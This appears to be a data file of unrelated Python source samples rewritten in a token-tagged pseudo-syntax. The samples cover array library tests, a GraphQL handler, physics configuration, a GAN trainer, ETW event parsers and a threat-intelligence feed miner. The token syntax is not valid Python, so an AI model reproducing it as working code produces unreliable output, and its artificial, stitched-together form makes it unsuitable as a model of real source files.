<block_start>assert_array_equal(cat2.category_array cat.category_array)<block_end><for_stmt>actual,expected zip(cat2.category_dict.values() cat.category_dict.values())<block_start>assert_array_equal(actual expected)<block_end>cat2_values,cat_values=cat2.expand_array cat.expand_array<line_sep>assert_array_equal(cat2_values cat_values)<line_sep># Test 2 As and from meta data Categoricals should be the same.
cat3=Categorical._from_meta_data(*cat._as_meta_data(name=name))<line_sep># Saved and loaded categoricals should be the same.
<assert_stmt>isinstance(cat3 Categorical)<line_sep>assert_array_equal(cat3._fa cat._fa)<if_stmt><not>cat.ismultikey# MultiKey Categorical's do not support category_array operation
<block_start>assert_array_equal(cat3.category_array cat.category_array)<block_end><for_stmt>actual,expected zip(cat3.category_dict.values() cat.category_dict.values())<block_start>assert_array_equal(actual expected)<block_end>cat3_values,cat_values=cat3.expand_array cat.expand_array<line_sep>assert_array_equal(cat3_values cat_values)<block_end><block_end>@pytest.mark.parametrize("categoricals" [# TODO handle CategoryMode IntEnum and Default
[Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])]+[Categorical(data base_index=0)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])]] )<def_stmt>test_from_bin categoricals<block_start><for_stmt>cat categoricals<block_start>cat_arr_len=len(cat.category_array)<line_sep># Test 1 All bin values are in the category array.
<if_stmt>cat.base_index<eq>0<block_start><for_stmt>i range(cat_arr_len)<block_start><assert_stmt>cat.from_bin(i)<in>cat.category_array<block_end><block_end><elif_stmt>cat.base_index<eq>1<block_start><for_stmt>i range(1 cat_arr_len+1)<block_start><assert_stmt>cat.from_bin(i)<in>cat.category_array<block_end><block_end><else_stmt><block_start><raise>ValueError(f"Unhandled Categorical base index {cat.base_index}")<block_end># Test 2 Handling of invalid input types: base_index and bin.
# The bin is not an integer.
<with_stmt>pytest.raises(TypeError)<block_start>cat.from_bin(str(i))<line_sep>cat.from_bin(float(i))<block_end># Bin value out of range.
<with_stmt>pytest.raises(ValueError)<block_start>cat.from_bin(-1)<if_stmt>cat.base_index<eq>0<block_start>cat.from_bin(cat_arr_len)<block_end><elif_stmt>cat.base_index<eq>1<block_start>cat.from_bin(0)<line_sep>cat.from_bin(cat_arr_len+1)<block_end><else_stmt><block_start><raise>ValueError(f"Unhandled Categorical base index {cat.base_index}")<block_end><block_end># The base index is None.
cat.grouping._base_index=<none><with_stmt>pytest.raises(TypeError)<block_start>cat.from_bin(1)<block_end><block_end><block_end>@pytest.mark.parametrize("cat" get_all_categorical_data())<def_stmt>test_argsort cat<block_start>assert_array_equal(cat.argsort() np.argsort(cat._fa) "Categorical argsort should be equivalent to the argsort of the underlying FastArray" )<block_end>@pytest.mark.parametrize("cats" [pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])]) pytest.param([Categorical(data)<for>data get_categorical_data_factory_method(CategoryMode.MultiKey)] marks=[pytest.mark.xfail(reason="NotImplementedError: Add categories not supported for MultiKey Categoricals")] ) ] )# TODO parameterize across base index 0 and 1
<def_stmt>test_auto_add cats<block_start><for_stmt>cat cats<block_start>alpha,beta="alpha" "beta"<line_sep>first_index,last_index=0 len(cat)-1<line_sep># Test 1 auto_add_on will allow addition of a category if the Categorical is unlocked,
# otherwise an error is raised.
cat.auto_add_on()<line_sep>cat.unlock()# Categorical is unlocked
# Test 1.1 When unlocked and attempting to add a category, the categories should be added.
# set the first and last categories
cat[first_index]=cat[last_index]=alpha<line_sep># auto_add_on and unlock should not allow setting beyond the first and last index of categories
<with_stmt>pytest.raises(IndexError)# index out of bounds
<block_start>cat[first_index-1]=alpha<line_sep>cat[last_index+1]=alpha<block_end># category is added at specified index
first_category=cat.category_array[cat._fa[first_index]-1]<line_sep># TODO normalize the category_array value, which is sometimes a numpy str_ or bytes_ to an ascii and compare
# assert cat.category_array[cat._fa[first_index]-1] == alpha
# assert at.category_array[cat._fa[last_index]-1] == alpha
# added category is in category array and dictionary
<assert_stmt>alpha<in>cat.category_array<for_stmt>categories cat.category_dict.values()<block_start><assert_stmt>alpha<in>categories<block_end># Test 1.2 When locked and attempting to add a category, an error is raised and the categories should not be added.
cat.lock()# Categorical is locked
<with_stmt>pytest.raises(IndexError)# cannot add a category since index is locked
<block_start>cat[first_index]=beta<block_end><assert_stmt>beta<not><in>cat.category_array<for_stmt>categories cat.category_dict.values()<block_start><assert_stmt>beta<not><in>categories<block_end># Test 2 auto_add_off will prevent category assignment of non-existing categories and raise an error
cat.auto_add_off()<line_sep># Test 2.1 Unlocked case
cat.unlock()# Categorical is unlocked
<with_stmt>pytest.raises(ValueError)# cannot automatically add categories while auto_add_categories is False
<block_start>cat[first_index]=beta<block_end># Test 2.2 Locked case
cat.lock()<with_stmt>pytest.raises(IndexError)# cannot add a category since index is locked
<block_start>cat[first_index]=beta<block_end><block_end><block_end>@pytest.mark.xfail(reason="rt_numpy.unique() needs to handles multikey categoricals")<def_stmt>test_multikey_categorical_unique <block_start>c=Categorical([arange(3) FA(list('abc'))])<assert_stmt>len(c.unique())<eq>c.nunique()<block_end>@pytest.mark.parametrize("values" [list_bytes list_unicode list_true_unicode])<def_stmt>test_categorical_convert values<block_start>categories=list(set(values))<line_sep># pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c=pd.Categorical(values categories=categories[:-1])<line_sep># The output of categorical_convert, when applied to a pandas Categorical, can be used to
# construct a riptable Categorical. We test that this handles missing categories correctly.
rt_values,rt_categories=rt.categorical_convert(pd_c)<line_sep>cat=rt.Categorical(rt_values categories=rt_categories)<line_sep># The invalid category should not be in the Categorical.
missing_category=categories[-1]<assert_stmt>missing_category<not><in>cat<assert_stmt>missing_category<not><in>cat._categories<assert_stmt>missing_category<not><in>cat.category_array<assert_stmt>missing_category<not><in>cat.category_dict[next(iter(cat.category_dict))]# values of first key
# All other category values should be in the Categorical.
<for_stmt>e categories[:-1]# assert e in cat # uncomment when test_categorical_convert_xfail is fixed
<block_start><assert_stmt>e<in>cat._categories<assert_stmt>e<in>cat.category_array<assert_stmt>e<in>cat.category_dict[next(iter(cat.category_dict))]<block_end><block_end># values of first key
@pytest.mark.xfail(reason="RIP-396 - category not in Categorical, but is in Categorical.category_array")@pytest.mark.parametrize("values" [list_bytes ])<def_stmt>test_categorical_convert_xfail values<block_start>categories=list(set(values))<line_sep># pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c=pd.Categorical(values categories=categories[:-1])<line_sep>rt_values,rt_categories=rt.categorical_convert(pd_c)<line_sep>cat=rt.Categorical(rt_values categories=rt_categories)<line_sep># All other category values should be in the Categorical.
<for_stmt>e categories[:-1]<block_start><assert_stmt>e<in>cat<block_end><block_end><def_stmt>test_build_dicts_enum <block_start>str_to_int,int_to_str=Categories.build_dicts_enum(LikertDecision)<line_sep>codes=list(str_to_int.values())<times>2<line_sep>c=Categorical(codes categories=LikertDecision)<line_sep>c2=Categorical(codes categories=str_to_int)<line_sep>c3=Categorical(codes categories=int_to_str)<line_sep># c is the our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_enum
# should construct the same Categorical as c.
assert_array_equal(c c2)<line_sep>assert_array_equal(c c3)<block_end>@pytest.mark.parametrize("values" [list("abcdef") [b"a" b"b" b"c" b"d" b"e" b"f"]])<def_stmt>test_build_dicts_python values# int
<block_start>d={k:v<for>k,v enumerate(values)}<line_sep>str_to_int,int_to_str=Categories.build_dicts_python(d)<line_sep>codes=list(d.keys())<times>2<line_sep>c=Categorical(codes categories=d)<line_sep>c2=Categorical(codes categories=str_to_int)<line_sep>c3=Categorical(codes categories=int_to_str)<line_sep># c is the our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_python
# should construct the same Categorical as c.
assert_array_equal(c c2)<line_sep>assert_array_equal(c c3)<block_end>@pytest.mark.parametrize("a,b,a_in_b,b_in_a" [pytest.param(Cat(list('abc')) Cat(list('a')) FA([<true> <false> <false>]) FA([<true>]) id='single_key_overlap') pytest.param(Cat([FA(list('abc')) FA([1 2 3])]) Cat([FA(list('a')) FA([1])]) FA([<true> <false> <false>]) FA([<true>]) id='single_multikey_overlap') pytest.param(Cat([FA(list('abc')) FA([1 2 3])]) Cat([FA(list('ab')) FA([1 2])]) FA([<true> <true> <false>]) FA([<true> <true>]) id='two_multikey_overlap') pytest.param(Cat([FA(list('abcde')) FA([1 2 3 4 5])]) Cat([FA(list('dc')) FA([4 5])]) FA([<false> <false> <false> <true> <false>]) FA([<true> <false>]) id='single_multikey_overlap2') pytest.param(Cat([FA(list('abcde')) FA([1 2 3 4 5])]) Cat([FA(list('aba')) FA([1 2 1])]) FA([<true> <true> <false> <false> <false>]) FA([<true> <true> <true>]) id='repeated_key_multikey_overlap') pytest.param(Cat([FA(list('abcdeab')) FA([1 2 3 4 5 1 6])]) Cat([FA(list('aba')) FA([1 2 1])]) FA([<true> <true> <false> <false> <false> <true> <false>]) FA([<true> <true> <true>]) id='repeated_key_multikey_overlap2') ])<def_stmt>test_multikey_categorical_isin a b a_in_b b_in_a<block_start>assert_array_equal(a_in_b a.isin(b))<line_sep>assert_array_equal(b_in_a b.isin(a))<line_sep># TODO this is a good candidate for a hypothesis test once the CategoricalStrategy is able to generate MultiKey Categoricals
f_msg='expected to be consistent with cat1.as_singlekey().isin(cat2.as_singlekey()) operation.'<line_sep>assert_array_equal(a.as_singlekey().isin(b.as_singlekey()) a.isin(b) f_msg)<line_sep>assert_array_equal(b.as_singlekey().isin(a.as_singlekey()) b.isin(a) f_msg)<block_end>_make_unique_test_cases=pytest.mark.parametrize('cat, expected' [(rt.Cat([1 1 2 2] ['a' 'a']) rt.Cat([1 1 1 1] ['a'])) (rt.Cat([2 2 2 2] ['a' 'a']) rt.Cat([1 1 1 1] ['a'])) (rt.Cat([1 2 3 3] ['a' 'a' 'b']) rt.Cat([1 1 2 2] ['a' 'b'])) (rt.Cat([0 0 1 1] ['a' 'a'] base_index=0) rt.Cat([0 0 0 0] ['a'] base_index=0)) (rt.Cat([1 1 1 1] ['a' 'a'] base_index=0) rt.Cat([0 0 0 0] ['a'] base_index=0)) (rt.Cat([0 0 1 1] ['a' 'b'] base_index=0) rt.Cat([0 0 1 1] ['a' 'b'] base_index=0)) (rt.Cat([1 1 2 2 3] [99 99 101] ) rt.Cat([1 1 1 1 2] [99 101])) (rt.Cat([0 0 1 1] [99 99] base_index=0) rt.Cat([0 0 0 0] [99] base_index=0)) (rt.Cat([0 0 1 1] [99 101] base_index=0) rt.Cat([0 0 1 1] [99 101] base_index=0)) (rt.Cat([0 0 1 1 2 2] ['a' 'a'] ) rt.Cat([0 0 1 1 1 1] ['a'] )) (rt.Cat([0 0 1 1 2 2 3 3] ['a' 'a' 'b'] ) rt.Cat([0 0 1 1 1 1 2 2] ['a' 'b'] )) ])<line_sep>@_make_unique_test_cases<def_stmt>test_category_make_unique_not_inplace cat expected<block_start>res=cat.category_make_unique()<assert_stmt>(res<eq>expected).all()<block_end>@pytest.mark.parametrize('base_index' [0 1])<def_stmt>test_category_make_unique_multikey base_index<block_start>c1=Categorical(np.arange(10)%2 ['a' 'a'] base_index=base_index)<line_sep>c2=Categorical(np.arange(10)%3 ['a' 'b' 'c'] base_index=base_index)<line_sep>cat=Categorical([c1 c2] base_index=base_index)<line_sep>res=cat.category_make_unique()<assert_stmt>list(cat)<eq>list(res)<block_end>
|
<import_from_stmt>typing Any<import_from_stmt>strawberry.asgi.handlers GraphQLWSHandler<as>BaseGraphQLWSHandler<class_stmt>GraphQLWSHandler(BaseGraphQLWSHandler)<block_start><async_keyword><def_stmt>get_context self<arrow>Any<block_start><return><await>self._get_context()<block_end><async_keyword><def_stmt>get_root_value self<arrow>Any<block_start><return><await>self._get_root_value()<block_end><block_end>
|
## import skeleton process
<import_from_stmt>PhysicsTools.PatAlgos.patTemplate_cfg *<line_sep>#process.Tracer = cms.Service("Tracer")
# load the PAT config
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")<line_sep>patAlgosToolsTask.add(process.patCandidatesTask)<line_sep>#Temporary customize to the unit tests that fail due to old input samples
process.patTaus.skipMissingTauID=<true><line_sep>process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")<line_sep>patAlgosToolsTask.add(process.selectedPatCandidatesTask)<line_sep>## add inFlightMuons
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")<line_sep>process.inFlightMuons=cms.EDProducer("PATGenCandsFromSimTracksProducer" src=cms.InputTag("g4SimHits") ## use "fastSimProducer" for FastSim
setStatus=cms.int32(-1) particleTypes=cms.vstring("mu+") ## picks also mu-, of course
filter=cms.vstring("pt > 0.5") ## just for testing
makeMotherLink=cms.bool(<true>) writeAncestors=cms.bool(<true>) ## save also the intermediate GEANT ancestors of the muons
genParticles=cms.InputTag("genParticles") )<line_sep>patAlgosToolsTask.add(process.inFlightMuons)<line_sep>process.out.outputCommands.append('keep *_inFlightMuons_*_*')<line_sep>## prepare several clones of match associations for status 1, 3 and in flight muons (status -1)
process.muMatch3=process.muonMatch.clone(mcStatus=cms.vint32(3))<line_sep>patAlgosToolsTask.add(process.muMatch3)<line_sep>process.muMatch1=process.muonMatch.clone(mcStatus=cms.vint32(1))<line_sep>patAlgosToolsTask.add(process.muMatch1)<line_sep>process.muMatchF=process.muonMatch.clone(mcStatus=cms.vint32(-1) matched=cms.InputTag("inFlightMuons"))<line_sep>patAlgosToolsTask.add(process.muMatchF)<line_sep>process.patMuons.genParticleMatch=cms.VInputTag(cms.InputTag("muMatch3") cms.InputTag("muMatch1") cms.InputTag("muMatchF") )<line_sep>## dump event content
process.content=cms.EDAnalyzer("EventContentAnalyzer")<line_sep>## ------------------------------------------------------
# In addition you usually want to change the following
# parameters:
## ------------------------------------------------------
#
# process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions)
# ##
## switch to RECO input
<import_from_stmt>PhysicsTools.PatAlgos.patInputFiles_cff filesRelValTTbarGENSIMRECO<line_sep>process.source.fileNames=filesRelValTTbarGENSIMRECO<line_sep># ##
process.maxEvents.input=10<line_sep># ##
# process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py)
# ##
process.out.fileName='patTuple_addDecayInFlight.root'<line_sep># ##
# process.options.wantSummary = False ## (to suppress the long output at the end of the job)
|
<import_from_stmt>torch.autograd Variable<import_from_stmt>net_gan_mnist *<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>numpy<as>np<import_from_stmt>init *<class_stmt>MNISTGanTrainer(object)<block_start><def_stmt>__init__ self batch_size=64 latent_dims=100<block_start>super(MNISTGanTrainer self).__init__()<line_sep>self.dis=Dis28x28()<line_sep>self.gen=Gen28x28(latent_dims)<line_sep>self.dis_opt=torch.optim.Adam(self.dis.parameters() lr=0.0002 betas=(0.5 0.999) weight_decay=0.0005)<line_sep>self.gen_opt=torch.optim.Adam(self.gen.parameters() lr=0.0002 betas=(0.5 0.999) weight_decay=0.0005)<line_sep>self.true_labels=Variable(torch.LongTensor(np.ones(batch_size dtype=np.int)))<line_sep>self.fake_labels=Variable(torch.LongTensor(np.zeros(batch_size dtype=np.int)))<line_sep>self.dis.apply(xavier_weights_init)<line_sep>self.gen.apply(xavier_weights_init)<block_end><def_stmt>cuda self<block_start>self.dis.cuda()<line_sep>self.gen.cuda()<line_sep>self.true_labels=self.true_labels.cuda()<line_sep>self.fake_labels=self.fake_labels.cuda()<block_end><def_stmt>dis_update self images noise<block_start>self.dis.zero_grad()<line_sep>true_outputs=self.dis(images)<line_sep>true_loss=nn.functional.cross_entropy(true_outputs self.true_labels)<line_sep>_,true_predicts=torch.max(true_outputs.data 1)<line_sep>true_acc=(true_predicts<eq>1).sum()/(1.0<times>true_predicts.size(0))<line_sep>fake_images=self.gen(noise)<line_sep>fake_outputs=self.dis(fake_images)<line_sep>fake_loss=nn.functional.cross_entropy(fake_outputs self.fake_labels)<line_sep>_,fake_predicts=torch.max(fake_outputs.data 1)<line_sep>fake_acc=(fake_predicts<eq>0).sum()/(1.0<times>fake_predicts.size(0))<line_sep>d_loss=true_loss+fake_loss<line_sep>d_loss.backward()<line_sep>self.dis_opt.step()<line_sep><return>0.5<times>(true_acc+fake_acc)<block_end><def_stmt>gen_update self noise<block_start>self.gen.zero_grad()<line_sep>fake_images=self.gen(noise)<line_sep>fake_outputs=self.dis(fake_images)<line_sep>fake_loss=nn.functional.cross_entropy(fake_outputs self.true_labels)<line_sep>fake_loss.backward()<line_sep>self.gen_opt.step()<line_sep><return>fake_images<block_end><block_end>
|
# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
<import_stmt>os<import_stmt>pytest<import_stmt>torch<import_stmt>galileo.pytorch<as>gp<import_stmt>tensorflow<as>tf<import_stmt>galileo.tf<as>gt<import_from_stmt>galileo.tests.utils numpy_equal<line_sep>os.environ['CUDA_VISIBLE_DEVICES']='-1'<line_sep># batch size=5 num nodes=10
# indices [5, 9]
fanouts=[2 3]<line_sep>indices=[[2 7 4 4 2 1 3 8 1] [8 9 2 3 6 4 4 4 0] [4 7 1 0 1 3 0 4 1] [4 2 6 1 5 1 4 0 5] [3 2 2 9 8 8 0 1 7] ]<line_sep>expect_no_sort=[[2 8 4 4 3 2 8 4 4 3 7 9 7 2 2 7 9 7 2 2 7 9 7 2 2 4 2 1 6 2 4 2 1 6 2 4 2 1 6 2] [7 9 7 2 2 4 2 1 6 2 4 3 0 1 9 2 6 1 5 8 1 4 3 1 8 3 4 0 4 0 8 4 4 0 1 1 0 1 5 7] ]<line_sep>expect_sort=[[1 1 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 3 3 4 4 4 4 4 4 4 6 6 6 7 7 7 7 7 7 8 8 9 9 9] [0 4 1 7 4 1 9 5 8 1 8 4 0 4 1 0 7 2 2 7 2 1 6 3 8 1 4 0 5 4 0 2 1 1 3 9 2 3 6 4] ]<line_sep>expect_target=[2 8 4 4 3]<line_sep>@pytest.mark.parametrize('sort_indices' (<false> <true>))<def_stmt>test_relation_transform_tf sort_indices<block_start>rt=gt.RelationTransform(fanouts sort_indices=sort_indices sort_stable=<true>)<line_sep>res=rt.transform(dict(indices=tf.convert_to_tensor(indices) edge_weight=tf.random.normal((5 9))))<assert_stmt>list(res.keys())<eq>['relation_indices' 'relation_weight' 'target_indices' ]<assert_stmt>res['relation_indices'].shape<eq>[2 40]<line_sep>expect=expect_sort<if>sort_indices<else>expect_no_sort<assert_stmt>numpy_equal(res['relation_indices'].numpy() expect)<assert_stmt>res['relation_weight'].shape<eq>[40 1]<assert_stmt>res['target_indices'].shape<eq>[5]<assert_stmt>numpy_equal(res['target_indices'].numpy() expect_target)<block_end>@pytest.mark.parametrize('sort_indices' (<false> <true>))<def_stmt>test_relation_transform_pytorch sort_indices<block_start>rt=gp.RelationTransform(fanouts sort_indices=sort_indices sort_stable=<true>)<line_sep>res=rt.transform(dict(indices=torch.tensor(indices) edge_weight=torch.randn(5 9)))<assert_stmt>list(res.keys())<eq>['relation_indices' 'relation_weight' 'target_indices' ]<assert_stmt>numpy_equal(res['relation_indices'].shape [2 40])<if_stmt>sort_indices# sort is not stable in pytorch
<block_start><assert_stmt>numpy_equal(res['relation_indices'][0].numpy() expect_sort[0])<block_end><else_stmt><block_start><assert_stmt>numpy_equal(res['relation_indices'].numpy() expect_no_sort)<block_end><assert_stmt>numpy_equal(res['relation_weight'].shape [40 1])<assert_stmt>numpy_equal(res['target_indices'].shape [5])<assert_stmt>numpy_equal(res['target_indices'].numpy() expect_target)<block_end>
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Wininit
GUID : 206f6dea-d3c5-4d10-bc72-989f03c8b84b
"""<import_from_stmt>construct Int8sl Int8ul Int16ul Int16sl Int32sl Int32ul Int64sl Int64ul Bytes Double Float32l Struct<import_from_stmt>etl.utils WString CString SystemTime Guid<import_from_stmt>etl.dtyp Sid<import_from_stmt>etl.parsers.etw.core Etw declare guid<line_sep>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=9 version=0)<class_stmt>Microsoft_Windows_Wininit_9_0(Etw)<block_start>pattern=Struct("Flags"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=10 version=0)<class_stmt>Microsoft_Windows_Wininit_10_0(Etw)<block_start>pattern=Struct("Win32Status"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=11 version=0)<class_stmt>Microsoft_Windows_Wininit_11_0(Etw)<block_start>pattern=Struct("StringCount"/Int32ul "String"/WString)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=12 version=0)<class_stmt>Microsoft_Windows_Wininit_12_0(Etw)<block_start>pattern=Struct("Level"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=14 version=0)<class_stmt>Microsoft_Windows_Wininit_14_0(Etw)<block_start>pattern=Struct("Config"/Int32ul "IsTestConfig"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=16 version=0)<class_stmt>Microsoft_Windows_Wininit_16_0(Etw)<block_start>pattern=Struct("Level"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=17 version=0)<class_stmt>Microsoft_Windows_Wininit_17_0(Etw)<block_start>pattern=Struct("Level"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=53 version=0)<class_stmt>Microsoft_Windows_Wininit_53_0(Etw)<block_start>pattern=Struct("SessionId"/Int32ul "Flags"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=55 version=0)<class_stmt>Microsoft_Windows_Wininit_55_0(Etw)<block_start>pattern=Struct("SessionId"/Int32ul "IsRemote"/Int32ul "GracePeriod"/Int32ul "Flags"/Int32ul "Reason"/Int32ul "Message"/WString)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=6001 version=0)<class_stmt>Microsoft_Windows_Wininit_6001_0(Etw)<block_start>pattern=Struct("Flags"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=6002 version=1)<class_stmt>Microsoft_Windows_Wininit_6002_1(Etw)<block_start>pattern=Struct("ShutdownFlags"/Int32ul "SystemShutdownDuration"/Int64ul "SkuHasLogoff"/Int32ul)<block_end>
|
# Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements minemeld.ft.http.HttpFT, the Miner node for plain
text feeds over HTTP/HTTPS.
"""<import_stmt>requests<import_stmt>logging<import_stmt>re<import_stmt>itertools<import_from_stmt>minemeld __version__<as>MM_VERSION<import_from_stmt>. basepoller<line_sep>LOG=logging.getLogger(__name__)<class_stmt>HttpFT(basepoller.BasePollerFT)<block_start>"""Implements class for miners of plain text feeds over http/https.
**Config parameters**
:url: URL of the feed.
:polling_timeout: timeout of the polling request in seconds.
Default: 20
:verify_cert: boolean, if *true* feed HTTPS server certificate is
verified. Default: *true*
:user_agent: string, value for the User-Agent header in HTTP
request. If ``MineMeld``, MineMeld/<version> is used.
Default: python ``requests`` default.
:ignore_regex: Python regular expression for lines that should be
ignored. Default: *null*
:indicator: an *extraction dictionary* to extract the indicator from
the line. If *null*, the text until the first whitespace or newline
character is used as indicator. Default: *null*
:fields: a dicionary of *extraction dictionaries* to extract
additional attributes from each line. Default: {}
:encoding: encoding of the feed, if not UTF-8. See
``str.decode`` for options. Default: *null*, meaning do
nothing, (Assumes UTF-8).
**Extraction dictionary**
Extraction dictionaries contain the following keys:
:regex: Python regular expression for searching the text.
:transform: template to generate the final value from the result
of the regular expression. Default: the entire match of the regex
is used as extracted value.
See Python `re <https://docs.python.org/2/library/re.html>`_ module for
details about Python regular expressions and templates.
Example:
Example config in YAML where extraction dictionaries are used to
extract the indicator and additional fields::
url: https://www.dshield.org/block.txt
ignore_regex: "[#S].*"
indicator:
regex: '^([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\t([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})'
transform: '\\1-\\2'
fields:
dshield_nattacks:
regex: '^.*\\t.*\\t[0-9]+\\t([0-9]+)'
transform: '\\1'
dshield_name:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t([^\\t]+)'
transform: '\\1'
dshield_country:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t([A-Z]+)'
transform: '\\1'
dshield_email:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t[A-Z]+\\t(\\S+)'
transform: '\\1'
Example config in YAML where the text in each line until the first
whitespace is used as indicator::
url: https://ransomwaretracker.abuse.ch/downloads/CW_C2_URLBL.txt
ignore_regex: '^#'
Args:
name (str): node name, should be unique inside the graph
chassis (object): parent chassis instance
config (dict): node config.
"""<def_stmt>configure self<block_start>super(HttpFT self).configure()<line_sep>self.url=self.config.get('url' <none>)<line_sep>self.polling_timeout=self.config.get('polling_timeout' 20)<line_sep>self.verify_cert=self.config.get('verify_cert' <true>)<line_sep>self.user_agent=self.config.get('user_agent' <none>)<line_sep>self.encoding=self.config.get('encoding' <none>)<line_sep>self.username=self.config.get('username' <none>)<line_sep>self.password=self.config.get('password' <none>)<line_sep>self.ignore_regex=self.config.get('ignore_regex' <none>)<if_stmt>self.ignore_regex<is><not><none><block_start>self.ignore_regex=re.compile(self.ignore_regex)<block_end>self.indicator=self.config.get('indicator' <none>)<if_stmt>self.indicator<is><not><none><block_start><if_stmt>'regex'<in>self.indicator<block_start>self.indicator['regex']=re.compile(self.indicator['regex'])<block_end><else_stmt><block_start><raise>ValueError('%s - indicator stanza should have a regex' self.name)<block_end><if_stmt>'transform'<not><in>self.indicator<block_start><if_stmt>self.indicator['regex'].groups<g>0<block_start>LOG.warning('%s - no transform string for indicator'<concat>' but pattern contains groups' self.name)<block_end>self.indicator['transform']='\g<0>'<block_end><block_end>self.fields=self.config.get('fields' {})<for_stmt>f,fattrs self.fields.iteritems()<block_start><if_stmt>'regex'<in>fattrs<block_start>fattrs['regex']=re.compile(fattrs['regex'])<block_end><else_stmt><block_start><raise>ValueError('%s - %s field does not have a regex' self.name f)<block_end><if_stmt>'transform'<not><in>fattrs<block_start><if_stmt>fattrs['regex'].groups<g>0<block_start>LOG.warning('%s - no transform string for field %s'<concat>' but pattern contains groups' self.name f)<block_end>fattrs['transform']='\g<0>'<block_end><block_end><block_end><def_stmt>_process_item self line<block_start>line=line.strip()<if_stmt><not>line<block_start><return>[[<none> <none>]]<block_end><if_stmt>self.indicator<is><none><block_start>indicator=line.split()[0]<block_end><else_stmt><block_start>indicator=self.indicator['regex'].search(line)<if_stmt>indicator<is><none><block_start><return>[[<none> <none>]]<block_end>indicator=indicator.expand(self.indicator['transform'])<block_end>attributes={}<for_stmt>f,fattrs self.fields.iteritems()<block_start>m=fattrs['regex'].search(line)<if_stmt>m<is><none><block_start><continue><block_end>attributes[f]=m.expand(fattrs['transform'])<try_stmt><block_start>i=int(attributes[f])<block_end><except_stmt><block_start><pass><block_end><else_stmt><block_start>attributes[f]=i<block_end><block_end><return>[[indicator attributes]]<block_end><def_stmt>_build_iterator self now<block_start>rkwargs=dict(stream=<true> verify=self.verify_cert timeout=self.polling_timeout)<if_stmt>self.user_agent<is><not><none><block_start><if_stmt>self.user_agent<eq>'MineMeld'<block_start>rkwargs['headers']={'User-Agent':'MineMeld/%s'%MM_VERSION}<block_end><else_stmt><block_start>rkwargs['headers']={'User-Agent':self.user_agent}<block_end><block_end><if_stmt>self.username<is><not><none><and>self.password<is><not><none><block_start>rkwargs['auth']=(self.username self.password)<block_end>r=requests.get(self.url **rkwargs)<try_stmt><block_start>r.raise_for_status()<block_end><except_stmt><block_start>LOG.debug('%s - exception in request: %s %s' self.name r.status_code r.content)<line_sep><raise><block_end>result=r.iter_lines()<if_stmt>self.ignore_regex<is><not><none><block_start>result=itertools.ifilter(<lambda>x:self.ignore_regex.match(x)<is><none> result)<block_end><if_stmt>self.encoding<is><not><none><block_start>result=itertools.imap(<lambda>x:x.decode(self.encoding).encode('utf_8') result)<block_end><return>result<block_end><block_end>
|
